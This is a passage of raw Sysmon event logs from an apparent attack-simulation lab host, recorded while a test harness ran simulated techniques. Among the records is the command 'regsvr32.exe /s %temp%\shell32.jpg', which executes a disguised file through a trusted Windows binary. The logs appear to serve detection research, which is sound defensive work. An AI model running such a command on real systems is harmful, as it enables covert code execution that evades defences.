Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032886Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.897{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032885Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.897{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032884Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.897{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032883Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.897{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032882Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.897{FF16AF91-26BA-6013-2300-00000000A401}28124716C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7903-00000000A401}2324C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032881Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.897{FF16AF91-36E1-6013-7703-00000000A401}62561104C:\Windows\system32\cmd.exe{FF16AF91-36E1-6013-7903-00000000A401}2324C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032880Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.906{FF16AF91-36E1-6013-7903-00000000A401}2324C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\system32\regsvr32.exe /s C:\Users\Administrator\AppData\Local\Temp\chocolatey\shell32.jpg C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{FF16AF91-36E1-6013-7703-00000000A401}6256C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s %temp%\shell32.jpg" 10341000x800000000000000032879Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.897{FF16AF91-26EB-6013-9700-00000000A401}57963100C:\Windows\system32\conhost.exe{FF16AF91-36E1-6013-7703-00000000A401}6256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032878Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032877Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032876Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032875Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032874Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26BA-6013-2300-00000000A401}28122960C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032873Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-7703-00000000A401}6256C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFE178CA5C3) 10341000x800000000000000032872Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-36E1-6013-7603-00000000A401}61565416C:\Windows\SysWOW64\calc.exe{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\System32\windows.storage.dll+1240e6(wow64)|C:\Windows\System32\windows.storage.dll+123da1(wow64)|C:\Windows\System32\windows.storage.dll+123e73(wow64)|C:\Windows\System32\windows.storage.dll+124b45(wow64)|C:\Windows\System32\windows.storage.dll+1239f1(wow64)|C:\Windows\System32\windows.storage.dll+125d40(wow64)|C:\Windows\System32\windows.storage.dll+125fbc(wow64)|C:\Windows\System32\windows.storage.dll+1258a5(wow64)|C:\Windows\System32\windows.storage.dll+102d28(wow64)|C:\Windows\System32\windows.storage.dll+102b67(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64)|C:\Windows\System32\SHELL32.dll+1aa3b1(wow64) 154100x800000000000000032871Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.895{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXE"C:\Windows\System32\win32calc.exe" C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=A20DCDBED017776C8B3D01A511A8DC46,SHA256=84173F0B3176F68428A88A6870AF6236F28FAEE117074FB36A0BCCCFB55EB301,IMPHASH=C261A11FB3872511CF73DBF1A1E04631{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe"C:\Windows\System32\calc.exe" 10341000x800000000000000032870Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032869Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032868Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032867Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032866Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26BA-6013-2300-00000000A401}28122828C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7703-00000000A401}6256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032865Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-7703-00000000A401}6256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503746(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5035ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e585de6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4fc1a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5395(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e522e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e50635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4f82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e531474(wow64) 154100x800000000000000032864Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.893{FF16AF91-36E1-6013-7703-00000000A401}6256C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s %%temp%%\shell32.jpg" C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000032863Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-err.txt2021-01-28 22:12:49.366 11241100x800000000000000032862Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-out.txt2021-01-28 22:12:49.366 10341000x800000000000000032861Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.882{FF16AF91-26B5-6013-0B00-00000000A401}8603460C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032860Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 